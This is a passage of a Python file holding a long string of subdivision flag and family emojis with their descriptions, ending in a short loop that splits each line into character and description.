🏴 Flag for Central (LK-2)
🏴 Flag for Mauren (LI-04)
🏴 Flag for Nabatieh (LB-NA)
🏴 Flag for Dennery (LC-05)
🏴 Flag for South (LB-JA)
🏴 Flag for Vaduz (LI-11)
🏴 Flag for Castries (LC-02)
🏴 Flag for Uva (LK-8)
🏴 Flag for Triesenberg (LI-10)
🏴 Flag for Planken (LI-05)
🏴 Flag for Vieux Fort (LC-11)
🏴 Flag for Baalbek-Hermel (LB-BH)
🏴 Flag for North Western (LK-6)
🏴 Flag for Ruggell (LI-06)
🏴 Flag for Micoud (LC-08)
🏴 Flag for Eschen (LI-02)
🏴 Flag for Canaries (LC-12)
🏴 Flag for Beirut (LB-BA)
🏴 Flag for Xiangkhouang (LA-XI)
🏴 Flag for Soufrière (LC-10)
🏴 Flag for Anse la Raye (LC-01)
🏴 Flag for Choiseul (LC-03)
🏴 Flag for Gamprin (LI-03)
🏴 Flag for Northern (LK-4)
🏴 Flag for Grand Bassa (LR-GB)
🏴 Flag for Gbarpolu (LR-GP)
🏴 Flag for Grand Gedeh (LR-GG)
🏴 Flag for Jurbarkas (LT-12)
🏴 Flag for Nimba (LR-NI)
🏴 Flag for Central Finland (FI-08)
🏴 Flag for Jonava (LT-10)
🏴 Flag for Margibi (LR-MG)
🏴 Flag for Sinoe (LR-SI)
🏴 Flag for Montserrado (LR-MO)
🏴 Flag for Kaunas (LT-16)
🏴 Flag for Thaba-Tseka (LS-K)
🏴 Flag for Birštonas (LT-05)
🏴 Flag for Mohale’s Hoek (LS-F)
🏴 Flag for Bomi (LR-BM)
🏴 Flag for Druskininkai (LT-07)
🏴 Flag for Kalvarija (LT-14)
🏴 Flag for Kauno Municipality (LT-15)
🏴 Flag for Qacha’s Nek (LS-H)
🏴 Flag for Anykščiai (LT-04)
🏴 Flag for Leribe (LS-C)
🏴 Flag for Joniškis (LT-11)
🏴 Flag for Lofa (LR-LO)
🏴 Flag for Rivercess (LR-RI)
🏴 Flag for Kaišiadorys (LT-13)
🏴 Flag for Elektrėnai (LT-08)
🏴 Flag for Grand Kru (LR-GK)
🏴 Flag for Berea (LS-D)
🏴 Flag for Quthing (LS-G)
🏴 Flag for Butha-Buthe (LS-B)
🏴 Flag for Akmenė (LT-01)
🏴 Flag for Ignalina (LT-09)
🏴 Flag for Mafeteng (LS-E)
🏴 Flag for Mokhotlong (LS-J)
🏴 Flag for Alytus (LT-03)
🏴 Flag for Biržai (LT-06)
🏴 Flag for Nana-Grébizi (CF-KB)
🏴 Flag for River Gee (LR-RG)
🏴 Flag for Utena (LT-54)
🏴 Flag for Molėtai (LT-27)
🏴 Flag for Šakiai (LT-41)
🏴 Flag for Kelmė (LT-19)
🏴 Flag for Kupiškis (LT-23)
🏴 Flag for Vilkaviškis (LT-56)
🏴 Flag for Neringa (LT-28)
🏴 Flag for Panevėžys (LT-33)
🏴 Flag for Pagėgiai (LT-29)
🏴 Flag for Šiaulių Municipality (LT-43)
🏴 Flag for Palanga (LT-31)
🏴 Flag for Kėdainiai (LT-18)
🏴 Flag for Rokiškis (LT-40)
🏴 Flag for Šilalė (LT-45)
🏴 Flag for Trakai (LT-52)
🏴 Flag for Pohnpei (FM-PNI)
🏴 Flag for Prienai (LT-36)
🏴 Flag for Telšiai (LT-51)
🏴 Flag for Klaipėda (LT-21)
🏴 Flag for Kazlų Rūda (LT-17)
🏴 Flag for Širvintos (LT-47)
🏴 Flag for Pakruojis (LT-30)
🏴 Flag for Šiauliai (LT-44)
🏴 Flag for Kretinga (LT-22)
🏴 Flag for Šilutė (LT-46)
🏴 Flag for Šalčininkai (LT-42)
🏴 Flag for Raseiniai (LT-38)
🏴 Flag for Varėna (LT-55)
🏴 Flag for Pasvalys (LT-34)
🏴 Flag for Plungė (LT-35)
🏴 Flag for Švenčionys (LT-49)
🏴 Flag for Radviliškis (LT-37)
🏴 Flag for Lazdijai (LT-24)
🏴 Flag for Tauragė (LT-50)
🏴 Flag for Skuodas (LT-48)
🏴 Flag for Ukmergė (LT-53)
🏴 Flag for Rietavas (LT-39)
🏴 Flag for Marijampolė (LT-25)
🏴 Flag for Mažeikiai (LT-26)
🏴 Flag for Baldone (LV-013)
🏴 Flag for Vilnius County (LT-VL)
🏴 Flag for Alsunga (LV-006)
🏴 Flag for Vilnius (LT-58)
🏴 Flag for Tauragė County (LT-TA)
🏴 Flag for Utena County (LT-UT)
🏴 Flag for Aizkraukle (LV-002)
🏴 Flag for Diekirch (LU-DI)
🏴 Flag for Marijampolė County (LT-MR)
👩🏽👨🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Šiauliai County (LT-SA)
🏴 Flag for Echternach (LU-EC)
🏴 Flag for Redange (LU-RD)
🏴 Flag for Clervaux (LU-CL)
🏴 Flag for Visaginas (LT-59)
🏴 Flag for Ape (LV-009)
🏴 Flag for Amata (LV-008)
🏴 Flag for Alytus County (LT-AL)
🏴 Flag for Grevenmacher (LU-GR)
🏴 Flag for Aglona (LV-001)
🏴 Flag for Mersch (LU-ME)
🏴 Flag for Vianden (LU-VD)
🏴 Flag for Aloja (LV-005)
🏴 Flag for Mount Lebanon (LB-JL)
🏴 Flag for Kaunas County (LT-KU)
🏴 Flag for Zarasai (LT-60)
🏴 Flag for Wiltz (LU-WI)
🏴 Flag for Ādaži (LV-011)
🏴 Flag for Luxembourg (LU-LU)
🏴 Flag for Telšiai County (LT-TE)
🏴 Flag for Alūksne (LV-007)
🏴 Flag for Remich (LU-RM)
🏴 Flag for Aknīste (LV-004)
🏴 Flag for Esch-sur-Alzette (LU-ES)
🏴 Flag for Aizpute (LV-003)
🏴 Flag for Klaipėda County (LT-KL)
🏴 Flag for Dundaga (LV-027)
🏴 Flag for Jaunpils (LV-040)
🏴 Flag for Burtnieki (LV-019)
🏴 Flag for Balvi (LV-015)
🏴 Flag for Beverīna (LV-017)
🏴 Flag for Daugavpils Municipality (LV-025)
🏴 Flag for Cesvaine (LV-021)
🏴 Flag for Ilūkste (LV-036)
🏴 Flag for Kuldīga (LV-050)
🏴 Flag for Grobiņa (LV-032)
🏴 Flag for Gulbene (LV-033)
🏴 Flag for Kandava (LV-043)
🏴 Flag for Brocēni (LV-018)
🏴 Flag for Krimulda (LV-048)
🏴 Flag for Carnikava (LV-020)
🏴 Flag for Krustpils (LV-049)
👩🏾👨🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Dobele (LV-026)
🏴 Flag for Kocēni (LV-045)
🏴 Flag for Garkalne (LV-031)
🏴 Flag for Ērgļi (LV-030)
🏴 Flag for Durbe (LV-028)
🏴 Flag for Krāslava (LV-047)
🏴 Flag for Dagda (LV-024)
🏴 Flag for Jaunjelgava (LV-038)
🏴 Flag for Bauska (LV-016)
🏴 Flag for Baltinava (LV-014)
🏴 Flag for Jēkabpils Municipality (LV-042)
🏴 Flag for Jaunpiebalga (LV-039)
🏴 Flag for Cēsis (LV-022)
🏴 Flag for Iecava (LV-034)
🏴 Flag for Ķegums (LV-051)
🏴 Flag for Ikšķile (LV-035)
🏴 Flag for Cibla (LV-023)
🏴 Flag for Kārsava (LV-044)
🏴 Flag for Engure (LV-029)
🏴 Flag for Līgatne (LV-055)
🏴 Flag for Nīca (LV-066)
🏴 Flag for Mālpils (LV-061)
🏴 Flag for Kvemo Kartli (GE-KK)
🏴 Flag for Pārgauja (LV-070)
🏴 Flag for Lielvārde (LV-053)
🏴 Flag for Pļaviņas (LV-072)
🏴 Flag for Pāvilosta (LV-071)
🏴 Flag for Madona (LV-059)
🏴 Flag for Rauna (LV-076)
🏴 Flag for Limbaži (LV-054)
🏴 Flag for Naukšēni (LV-064)
🏴 Flag for Ķekava (LV-052)
🏴 Flag for Salaspils (LV-087)
🏴 Flag for Mērsrags (LV-063)
🏴 Flag for Olaine (LV-068)
🏴 Flag for Roja (LV-079)
🏴 Flag for Rucava (LV-081)
🏴 Flag for Rugāji (LV-082)
🏴 Flag for Ogre (LV-067)
🏴 Flag for Rūjiena (LV-084)
🏴 Flag for Saulkrasti (LV-089)
🏴 Flag for Saldus (LV-088)
🏴 Flag for Rundāle (LV-083)
🏴 Flag for Nereta (LV-065)
🏴 Flag for Ozolnieki (LV-069)
🏴 Flag for Ropaži (LV-080)
🏴 Flag for Riebiņi (LV-078)
🏴 Flag for Līvāni (LV-056)
🏴 Flag for Priekuļi (LV-075)
🏴 Flag for Ludza (LV-058)
🏴 Flag for Sēja (LV-090)
🏴 Flag for Priekule (LV-074)
🏴 Flag for Lubāna (LV-057)
🏴 Flag for Salacgrīva (LV-086)
🏴 Flag for Mārupe (LV-062)
🏴 Flag for Preiļi (LV-073)
🏴 Flag for Viesīte (LV-107)
🏴 Flag for Smiltene (LV-094)
🏴 Flag for Kufra (LY-KF)
🏴 Flag for Daugavpils (LV-DGV)
🏴 Flag for Tukums (LV-099)
👩🏿👨🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Liepāja (LV-LPX)
🏴 Flag for Valka (LV-101)
🏴 Flag for Vārkava (LV-103)
🏴 Flag for Murqub (LY-MB)
🏴 Flag for Ventspils (LV-VEN)
🏴 Flag for Jabal al Akhdar (LY-JA)
🏴 Flag for Jēkabpils (LV-JKB)
🏴 Flag for Sigulda (LV-091)
🏴 Flag for Jabal al Gharbi (LY-JG)
🏴 Flag for Ghat (LY-GT)
🏴 Flag for Stopiņi (LV-095)
🏴 Flag for Riga (LV-RIX)
🏴 Flag for Derna (LY-DR)
🏴 Flag for Vaiņode (LV-100)
🏴 Flag for Varakļāni (LV-102)
🏴 Flag for Jelgava (LV-JEL)
🏴 Flag for Skrīveri (LV-092)
🏴 Flag for Talsi (LV-097)
🏴 Flag for Valmiera (LV-VMR)
🏴 Flag for Benghazi (LY-BA)
🏴 Flag for Rēzekne (LV-REZ)
🏴 Flag for Skrunda (LV-093)
🏴 Flag for Zilupe (LV-110)
🏴 Flag for Strenči (LV-096)
🏴 Flag for Jufra (LY-JU)
🏴 Flag for Vecpiebalga (LV-104)
🏴 Flag for Vecumnieki (LV-105)
🏴 Flag for Viļaka (LV-108)
🏴 Flag for Jūrmala (LV-JUR)
🏴 Flag for Viļāni (LV-109)
🏴 Flag for Tērvete (LV-098)
🏴 Flag for Grand Casablanca (MA-08)
🏴 Flag for Marj (LY-MJ)
🏴 Flag for Al Wahat (LY-WA)
🏴 Flag for Monte Carlo (MC-MC)
🏴 Flag for Guelmim-Es Semara (MA-14)
🏴 Flag for Zawiya (LY-ZA)
🏴 Flag for Gharb-Chrarda-Béni Hssen (MA-02)
🏴 Flag for Marrakesh-Tensift-El Haouz (MA-11)
🏴 Flag for Doukkala-Abda (MA-10)
👩🏽👩🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Rabat-Salé-Zemmour-Zaer (MA-07)
🏴 Flag for Oued Ed-Dahab-Lagouira (MA-16)
🏴 Flag for Nalut (LY-NL)
🏴 Flag for Sabha (LY-SB)
🏴 Flag for Taza-Al Hoceima-Taounate (MA-03)
🏴 Flag for Jardin Exotique de Monaco (MC-JE)
🏴 Flag for Wadi al Shatii (LY-WS)
🏴 Flag for Larvotto (MC-LA)
🏴 Flag for Nuqat al Khams (LY-NQ)
🏴 Flag for Malbousquet (MC-MA)
🏴 Flag for Tadla-Azilal (MA-12)
🏴 Flag for La Condamine (MC-CO)
🏴 Flag for Monaco-Ville (MC-MO)
🏴 Flag for Chaouia-Ouardigha (MA-09)
🏴 Flag for Tangier-Tétouan (MA-01)
🏴 Flag for Moneghetti (MC-MG)
🏴 Flag for Murzuq (LY-MQ)
🏴 Flag for Meknès-Tafilalet (MA-06)
🏴 Flag for Fontvieille (MC-FO)
🏴 Flag for Wadi al Hayaa (LY-WD)
🏴 Flag for La Colle (MC-CL)
🏴 Flag for Sirte (LY-SR)
🏴 Flag for Misrata (LY-MI)
🏴 Flag for Fès-Boulemane (MA-05)
🏴 Flag for Tripoli (LY-TB)
🏴 Flag for La Gare (MC-GA)
👩🏾👩🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Edineț (MD-ED)
🏴 Flag for Hîncești (MD-HI)
🏴 Flag for Fălești (MD-FA)
🏴 Flag for Criuleni (MD-CR)
🏴 Flag for Sîngerei (MD-SI)
🏴 Flag for Soroca (MD-SO)
🏴 Flag for Cantemir (MD-CT)
🏴 Flag for Rezina (MD-RE)
🏴 Flag for Șoldănești (MD-SD)
🏴 Flag for Briceni (MD-BR)
🏴 Flag for Vallon de la Rousse (MC-VR)
🏴 Flag for Bălţi (MD-BA)
🏴 Flag for Dubăsari (MD-DU)
🏴 Flag for Călărași (MD-CL)
🏴 Flag for Spélugues (MC-SP)
🏴 Flag for Cahul (MD-CA)
🏴 Flag for Ialoveni (MD-IA)
🏴 Flag for Orhei (MD-OR)
🏴 Flag for Drochia (MD-DR)
🏴 Flag for Gagauzia (MD-GA)
🏴 Flag for Cimișlia (MD-CM)
🏴 Flag for Ocniţa (MD-OC)
🏴 Flag for Basarabeasca (MD-BS)
🏴 Flag for Strășeni (MD-ST)
🏴 Flag for Anenii Noi (MD-AN)
🏴 Flag for Moulins (MC-MU)
🏴 Flag for Bender (MD-BD)
🏴 Flag for Glodeni (MD-GL)
🏴 Flag for La Source (MC-SO)
🏴 Flag for Chișinău (MD-CU)
🏴 Flag for Dondușeni (MD-DO)
🏴 Flag for Florești (MD-FL)
🏴 Flag for Port Hercules (MC-PH)
🏴 Flag for Nisporeni (MD-NI)
🏴 Flag for Rîșcani (MD-RI)
🏴 Flag for Leova (MD-LE)
🏴 Flag for Ştefan Vodă (MD-SV)
🏴 Flag for Ungheni (MD-UN)
🏴 Flag for Toamasina (MG-A)
🏴 Flag for Antananarivo (MG-T)
🏴 Flag for Cetinje (ME-06)
🏴 Flag for Bogdanci (MK-05)
🏴 Flag for Ulcinj (ME-20)
🏴 Flag for Kolašin (ME-09)
🏴 Flag for Bosilovo (MK-07)
🏴 Flag for Pljevlja (ME-14)
🏴 Flag for Telenești (MD-TE)
🏴 Flag for Bogovinje (MK-06)
🏴 Flag for Žabljak (ME-21)
🏴 Flag for Herceg Novi (ME-08)
🏴 Flag for Petnjica (ME-23)
🏴 Flag for Rožaje (ME-17)
🏴 Flag for Budva (ME-05)
🏴 Flag for Bar (ME-02)
🏴 Flag for Berovo (MK-03)
🏴 Flag for Tivat (ME-19)
🏴 Flag for Plužine (ME-15)
🏴 Flag for Kotor (ME-10)
🏴 Flag for Ralik Chain (MH-L)
🏴 Flag for Danilovgrad (ME-07)
🏴 Flag for Plav (ME-13)
🏴 Flag for Bitola (MK-04)
🏴 Flag for Bijelo Polje (ME-04)
🏴 Flag for Andrijevica (ME-01)
👩🏿👩🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Nikšić (ME-12)
🏴 Flag for Taraclia (MD-TA)
🏴 Flag for Mojkovac (ME-11)
🏴 Flag for Mahajanga (MG-M)
🏴 Flag for Gusinje (ME-22)
🏴 Flag for Fianarantsoa (MG-F)
🏴 Flag for Šavnik (ME-18)
🏴 Flag for Podgorica (ME-16)
🏴 Flag for Toliara (MG-U)
🏴 Flag for Antsiranana (MG-D)
🏴 Flag for Kratovo (MK-43)
🏴 Flag for Kriva Palanka (MK-44)
🏴 Flag for Makedonski Brod (MK-52)
🏴 Flag for Jegunovce (MK-35)
🏴 Flag for Lozovo (MK-49)
🏴 Flag for Kumanovo (MK-47)
🏴 Flag for Vevčani (MK-12)
🏴 Flag for Demir Kapija (MK-24)
🏴 Flag for Vasilevo (MK-11)
🏴 Flag for Želino (MK-30)
🏴 Flag for Kavadarci (MK-36)
🏴 Flag for Zelenikovo (MK-32)
🏴 Flag for Konče (MK-41)
🏴 Flag for Vinica (MK-14)
🏴 Flag for Valandovo (MK-10)
🏴 Flag for Novaci (MK-55)
🏴 Flag for Novo Selo (MK-56)
🏴 Flag for Ilinden (MK-34)
🏴 Flag for Makedonska Kamenica (MK-51)
🏴 Flag for Vrapčište (MK-16)
🏴 Flag for Brvenica (MK-08)
🏴 Flag for Gradsko (MK-20)
🏴 Flag for Mavrovo and Rostuša (MK-50)
🏴 Flag for Debarca (MK-22)
🏴 Flag for Gostivar (MK-19)
🏴 Flag for Mogila (MK-53)
🏴 Flag for Lipkovo (MK-48)
🏴 Flag for Karbinci (MK-37)
🏴 Flag for Zrnovci (MK-33)
🏴 Flag for Negotino (MK-54)
🏴 Flag for Kičevo (MK-40)
🏴 Flag for Debar (MK-21)
🏴 Flag for Veles (MK-13)
🏴 Flag for Dojran (MK-26)
🏴 Flag for Gevgelija (MK-18)
🏴 Flag for Kočani (MK-42)
🏴 Flag for Krivogaštani (MK-45)
🏴 Flag for Delčevo (MK-23)
🏴 Flag for Kruševo (MK-46)
🏴 Flag for Čučer-Sandevo (MK-82)
🏴 Flag for Prilep (MK-62)
🏴 Flag for Centar Župa (MK-78)
🏴 Flag for Mandalay (MM-04)
🏴 Flag for Ségou (ML-4)
🏴 Flag for Petrovec (MK-59)
🏴 Flag for Češinovo-Obleševo (MK-81)
🏴 Flag for Kidal (ML-8)
🏴 Flag for Bago (MM-02)
🏴 Flag for Struga (MK-72)
🏴 Flag for Tearce (MK-75)
🏴 Flag for Studeničani (MK-74)
🏴 Flag for Ohrid (MK-58)
🏴 Flag for Sveti Nikole (MK-69)
🏴 Flag for Strumica (MK-73)
🏴 Flag for Sikasso (ML-3)
🏴 Flag for Kachin (MM-11)
🏴 Flag for Resen (MK-66)
🏴 Flag for Bamako (ML-BKO)
🏴 Flag for Magway (MM-03)
🏴 Flag for Sopište (MK-70)
🏴 Flag for Staro Nagoričane (MK-71)
🏴 Flag for Ayeyarwady (MM-07)
🏴 Flag for Gao (ML-7)
🏴 Flag for Mopti (ML-5)
🏴 Flag for Štip (MK-83)
🏴 Flag for Kayah (MM-12)
🏴 Flag for Tanintharyi (MM-05)
🏴 Flag for Koulikoro (ML-2)
🏴 Flag for Probištip (MK-63)
🏴 Flag for Pehčevo (MK-60)
🏴 Flag for Sagaing (MM-01)
🏴 Flag for Čaška (MK-80)
🏴 Flag for Rankovce (MK-65)
🏴 Flag for Yangon (MM-06)
🏴 Flag for Tetovo (MK-76)
🏴 Flag for Rosoman (MK-67)
🏴 Flag for Assaba (MR-03)
🏴 Flag for Shan (MM-17)
🏴 Flag for Rakhine (MM-16)
🏴 Flag for Khövsgöl (MN-041)
🏴 Flag for Bayan-Ölgii (MN-071)
🏴 Flag for Bayankhongor (MN-069)
🏴 Flag for Dornod (MN-061)
🏴 Flag for Selenge (MN-049)
🏴 Flag for Ulaanbaatar (MN-1)
🏴 Flag for Darkhan-Uul (MN-037)
🏴 Flag for Töv (MN-047)
🏴 Flag for Mon (MM-15)
🏴 Flag for Trarza (MR-06)
🏴 Flag for Sükhbaatar (MN-051)
🏴 Flag for Gorgol (MR-04)
🏴 Flag for Övörkhangai (MN-055)
🏴 Flag for Chin (MM-14)
🏴 Flag for Bulgan (MN-067)
🏴 Flag for Zavkhan (MN-057)
🏴 Flag for Dornogovi (MN-063)
🏴 Flag for Ömnögovi (MN-053)
🏴 Flag for Kayin (MM-13)
🏴 Flag for Govi-Altai (MN-065)
🏴 Flag for Tiris Zemmour (MR-11)
🏴 Flag for Dundgovi (MN-059)
🏴 Flag for Arkhangai (MN-073)
🏴 Flag for Tagant (MR-09)
🏴 Flag for Khovd (MN-043)
🏴 Flag for Uvs (MN-046)
🏴 Flag for Govisümber (MN-064)
🏴 Flag for Brakna (MR-05)
🏴 Flag for Dakhlet Nouadhibou (MR-08)
🏴 Flag for Hodh Ech Chargui (MR-01)
🏴 Flag for Orkhon (MN-035)
🏴 Flag for Hodh El Gharbi (MR-02)
🏴 Flag for Naypyidaw (MM-18)
🏴 Flag for Adrar (MR-07)
🏴 Flag for Inchiri (MR-12)
🏴 Flag for Iklin (MT-19)
🏴 Flag for Għarb (MT-14)
🏴 Flag for Mqabba (MT-33)
🏴 Flag for Kerċem (MT-22)
🏴 Flag for Għasri (MT-16)
🏴 Flag for Lija (MT-24)
🏴 Flag for Birżebbuġa (MT-05)
🏴 Flag for Birkirkara (MT-04)
🏴 Flag for Mġarr (MT-31)
🏴 Flag for Balzan (MT-02)
🏴 Flag for Munxar (MT-36)
🏴 Flag for Għajnsielem (MT-13)
🏴 Flag for Naxxar (MT-38)
🏴 Flag for Floriana (MT-09)
🏴 Flag for Marsa (MT-26)
🏴 Flag for Dingli (MT-07)
🏴 Flag for Gudja (MT-11)
🏴 Flag for Kirkop (MT-23)
🏴 Flag for Marsaskala (MT-27)
🏴 Flag for Paola (MT-39)
🏴 Flag for Fontana (MT-10)
🏴 Flag for Msida (MT-34)
🏴 Flag for Nadur (MT-37)
🏴 Flag for Mosta (MT-32)
🏴 Flag for Imtarfa (MT-35)
🏴 Flag for Cospicua (MT-06)
🏴 Flag for Birgu (MT-03)
🏴 Flag for Nouakchott Nord (MR-14)
🏴 Flag for Gżira (MT-12)
🏴 Flag for Mellieħa (MT-30)
🏴 Flag for Għaxaq (MT-17)
🏴 Flag for Ħamrun (MT-18)
🏴 Flag for Fgura (MT-08)
🏴 Flag for Attard (MT-01)
🏴 Flag for Għargħur (MT-15)
🏴 Flag for Kalkara (MT-21)
🏴 Flag for Nouakchott Sud (MR-15)
🏴 Flag for Marsaxlokk (MT-28)
🏴 Flag for Victoria (MT-45)
🏴 Flag for Qala (MT-42)
🏴 Flag for Żabbar (MT-64)
🏴 Flag for Agaléga (MU-AG)
🏴 Flag for Ta’ Xbiex (MT-58)
🏴 Flag for Pietà (MT-41)
🏴 Flag for Sannat (MT-52)
🏴 Flag for Port Louis District (MU-PL)
🏴 Flag for Xagħra (MT-61)
🏴 Flag for Rivière Noire (MU-BL)
🏴 Flag for Sliema (MT-56)
🏴 Flag for Safi (MT-47)
🏴 Flag for Flacq (MU-FL)
🏴 Flag for Pembroke (MT-40)
🏴 Flag for Swieqi (MT-57)
🏴 Flag for Curepipe (MU-CU)
🏴 Flag for Żurrieq (MT-68)
🏴 Flag for San Ġwann (MT-49)
🏴 Flag for Grand Port (MU-GP)
🏴 Flag for Cargados Carajos (MU-CC)
🏴 Flag for Qrendi (MT-44)
🏴 Flag for Valletta (MT-60)
🏴 Flag for Pamplemousses (MU-PA)
🏴 Flag for Qormi (MT-43)
🏴 Flag for Port Louis (MU-PU)
🏴 Flag for Tarxien (MT-59)
🏴 Flag for Żebbuġ Gozo (MT-65)
🏴 Flag for Saint Lawrence (MT-50)
🏴 Flag for Żejtun (MT-67)
🏴 Flag for St. Paul’s Bay (MT-51)
🏴 Flag for Santa Luċija (MT-53)
🏴 Flag for Żebbuġ (MT-66)
🏴 Flag for Rabat (MT-46)
🏴 Flag for Siġġiewi (MT-55)
👩🏽👩🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Santa Venera (MT-54)
🏴 Flag for Xgħajra (MT-63)
🏴 Flag for Moka (MU-MO)
🏴 Flag for Michoacán (MX-MIC)
🏴 Flag for Northern (MW-N)
🏴 Flag for Upper North Province (MV-UN)
🏴 Flag for Colima (MX-COL)
🏴 Flag for Rodrigues (MU-RO)
🏴 Flag for Guanajuato (MX-GUA)
🏴 Flag for Ciudad de Mexico (MX-CMX)
🏴 Flag for Puebla (MX-PUE)
🏴 Flag for Quatre Bornes (MU-QB)
🏴 Flag for Oaxaca (MX-OAX)
🏴 Flag for Central (MW-C)
🏴 Flag for Savanne (MU-SA)
🏴 Flag for Morelos (MX-MOR)
🏴 Flag for Hidalgo (MX-HID)
🏴 Flag for Aguascalientes (MX-AGU)
🏴 Flag for Campeche (MX-CAM)
🏴 Flag for Nuevo León (MX-NLE)
🏴 Flag for Malé (MV-MLE)
🏴 Flag for Guerrero (MX-GRO)
🏴 Flag for Vacoas-Phoenix (MU-VP)
👨🏻👨🏻👦🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for North Central Province (MV-NC)
🏴 Flag for Mexico State (MX-MEX)
🏴 Flag for Plaines Wilhems (MU-PW)
🏴 Flag for Central Province (MV-CE)
🏴 Flag for Coahuila (MX-COA)
🏴 Flag for South Province (MV-SU)
🏴 Flag for Chiapas (MX-CHP)
🏴 Flag for Southern (MW-S)
🏴 Flag for Sofala (MZ-S)
🏴 Flag for Perlis (MY-09)
🏴 Flag for Veracruz (MX-VER)
🏴 Flag for Sarawak (MY-13)
🏴 Flag for Kelantan (MY-03)
🏴 Flag for Zambezi (NA-CA)
🏴 Flag for Manica (MZ-B)
🏴 Flag for Labuan (MY-15)
🏴 Flag for Cabo Delgado (MZ-P)
🏴 Flag for Hardap (NA-HA)
🏴 Flag for Tete (MZ-T)
🏴 Flag for Kedah (MY-02)
🏴 Flag for Pahang (MY-06)
🏴 Flag for Penang (MY-07)
🏴 Flag for Perak (MY-08)
🏴 Flag for Maputo Province (MZ-L)
🏴 Flag for Goiás (BR-GO)
🏴 Flag for Terengganu (MY-11)
🏴 Flag for Inhambane (MZ-I)
🏴 Flag for Malacca (MY-04)
🏴 Flag for Erongo (NA-ER)
🏴 Flag for Tlaxcala (MX-TLA)
🏴 Flag for Negeri Sembilan (MY-05)
🏴 Flag for Zacatecas (MX-ZAC)
🏴 Flag for Tamaulipas (MX-TAM)
🏴 Flag for Niassa (MZ-A)
🏴 Flag for Maputo (MZ-MPM)
🏴 Flag for Nampula (MZ-N)
🏴 Flag for Putrajaya (MY-16)
🏴 Flag for Sinaloa (MX-SIN)
🏴 Flag for Yucatán (MX-YUC)
🏴 Flag for Sabah (MY-12)
👩🏼👩🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Zambezia (MZ-Q)
🏴 Flag for Querétaro (MX-QUE)
🏴 Flag for Gaza (MZ-G)
🏴 Flag for Otjozondjupa (NA-OD)
🏴 Flag for Maradi (NE-4)
🏴 Flag for Kunene (NA-KU)
🏴 Flag for Akwa Ibom (NG-AK)
🏴 Flag for Tahoua (NE-5)
🏴 Flag for Rivière du Rempart (MU-RR)
🏴 Flag for Imo (NG-IM)
🏴 Flag for Katsina (NG-KT)
🏴 Flag for Dosso (NE-3)
🏴 Flag for Tillabéri (NE-6)
🏴 Flag for Ekiti (NG-EK)
🏴 Flag for Omaheke (NA-OH)
🏴 Flag for Bauchi (NG-BA)
🏴 Flag for Karas (NA-KA)
🏴 Flag for Bayelsa (NG-BY)
🏴 Flag for Ohangwena (NA-OW)
🏴 Flag for Benue (NG-BE)
🏴 Flag for Enugu (NG-EN)
🏴 Flag for Oshana (NA-ON)
🏴 Flag for Kaduna (NG-KD)
👨🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Kebbi (NG-KE)
🏴 Flag for Jigawa (NG-JI)
🏴 Flag for Niamey (NE-8)
🏴 Flag for Anambra (NG-AN)
🏴 Flag for Gombe (NG-GO)
🏴 Flag for Agadez (NE-1)
🏴 Flag for Khomas (NA-KH)
🏴 Flag for Diffa (NE-2)
🏴 Flag for Johor (MY-01)
🏴 Flag for Kano (NG-KN)
🏴 Flag for Omusati (NA-OS)
🏴 Flag for Kogi (NG-KO)
🏴 Flag for Edo (NG-ED)
🏴 Flag for Abia (NG-AB)
🏴 Flag for Oshikoto (NA-OT)
🏴 Flag for Kavango West (NA-KW)
🏴 Flag for Ebonyi (NG-EB)
🏴 Flag for Zinder (NE-7)
🏴 Flag for Jinotega (NI-JI)
🏴 Flag for Nasarawa (NG-NA)
🏴 Flag for Friesland (NL-FR)
🏴 Flag for Sokoto (NG-SO)
🏴 Flag for Rivas (NI-RI)
🏴 Flag for Nueva Segovia (NI-NS)
🏴 Flag for Plateau (NG-PL)
🏴 Flag for Yobe (NG-YO)
🏴 Flag for Bonaire (NL-BQ1)
🏴 Flag for Atlántico Norte (NI-AN)
🏴 Flag for Zamfara (NG-ZA)
🏴 Flag for Gelderland (NL-GE)
🏴 Flag for Oyo (NG-OY)
🏴 Flag for Madriz (NI-MD)
🏴 Flag for Chinandega (NI-CI)
🏴 Flag for Ondo (NG-ON)
👨🏽👨🏽👦🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for North Rhine-Westphalia (DE-NW)
🏴 Flag for Lagos (NG-LA)
🏴 Flag for Managua (NI-MN)
🏴 Flag for Atlántico Sur (NI-AS)
🏴 Flag for Curaçao (NL-CW)
🏴 Flag for Boaco (NI-BO)
🏴 Flag for Rivers (NG-RI)
🏴 Flag for Granada (NI-GR)
🏴 Flag for Chontales (NI-CO)
🏴 Flag for Groningen (NL-GR)
🏴 Flag for Sint Eustatius (NL-BQ3)
🏴 Flag for Río San Juan (NI-SJ)
🏴 Flag for Osun (NG-OS)
🏴 Flag for Taraba (NG-TA)
🏴 Flag for Flevoland (NL-FL)
🏴 Flag for Matagalpa (NI-MT)
🏴 Flag for Drenthe (NL-DR)
🏴 Flag for Carazo (NI-CA)
🏴 Flag for Kwara (NG-KW)
🏴 Flag for Niger (NG-NI)
🏴 Flag for Estelí (NI-ES)
🏴 Flag for South Holland (NL-ZH)
"""
for line in emojis.splitlines():
words = line.split()
char = words[0]
desc = " ".join(words[1:])
